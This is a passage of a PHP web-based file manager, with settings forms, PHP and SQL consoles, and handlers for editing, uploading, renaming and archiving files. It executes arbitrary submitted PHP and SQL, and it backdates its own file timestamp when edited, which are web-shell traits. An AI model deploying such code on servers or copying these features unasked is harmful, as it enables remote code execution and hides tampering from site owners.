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"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <script src="https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js"></script> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="25" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <script language="Javascript" type="text/javascript"> document.addEventListener('DOMContentLoaded', function() { editAreaLoader.init({ id: "newcontent" ,display: "later" ,start_highlight: true ,allow_resize: "both" ,allow_toggle: true ,word_wrap: true ,language: "ru" ,syntax: "<?=pathinfo($_REQUEST['edit'], PATHINFO_EXTENSION)?>" ,toolbar: "search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help" ,syntax_selection_allow: "css,html,js,php,python,xml,c,cpp,sql,basic,pas" }); }); </script> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . 